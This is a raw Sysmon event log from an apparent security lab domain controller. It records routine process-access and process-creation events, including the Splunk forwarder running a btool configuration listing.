13:55:56.213{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007482Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.213{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007481Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.213{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007480Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.213{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007479Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.213{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007478Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.213{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007477Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.213{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85EC-5FCF-3B01-000000009101}4156C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007476Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.213{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007475Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.213{10ACEC4A-85EC-5FCF-3A01-000000009101}41164440C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-85EC-5FCF-3B01-000000009101}4156C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007474Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.214{10ACEC4A-85EC-5FCF-3B01-000000009101}4156C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-85EC-5FCF-3A01-000000009101}4116C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000007473Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EC-5FCF-3A01-000000009101}4116C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007472Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007471Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007470Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007469Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007468Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007467Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007466Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007465Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007464Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007463Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85EC-5FCF-3A01-000000009101}4116C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007462Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-85EC-5FCF-3901-000000009101}45764196C:\Windows\system32\cmd.exe{10ACEC4A-85EC-5FCF-3A01-000000009101}4116C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007461Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.209{10ACEC4A-85EC-5FCF-3A01-000000009101}4116C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-85EC-5FCF-3901-000000009101}4576C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000007460Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EC-5FCF-3901-000000009101}4576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007459Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007458Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007457Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007456Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 